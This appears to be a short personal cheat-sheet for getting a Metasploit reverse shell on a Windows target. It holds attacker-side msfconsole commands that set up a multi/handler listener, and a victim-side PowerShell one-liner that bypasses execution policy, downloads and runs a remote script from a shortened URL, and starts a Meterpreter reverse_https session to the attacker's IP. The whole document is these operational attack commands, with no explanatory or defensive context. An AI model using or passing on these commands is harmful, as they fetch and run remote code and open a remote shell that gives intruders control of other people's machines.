notes/reverse meterpreter-qgkeLGQE.sh
You:
msfconsole
use multi/handler
set payload windows/shell/reverse_tcp
set LHOST 192.168.24.180 #your ip

set LPORT 8089
exploit

Them:
powershell -executionpolicy bypass "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/14bZZ0c'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.24.180 -Lport 8089 -Force"

syntax highlighted by Code2HTML, v. 0.9.1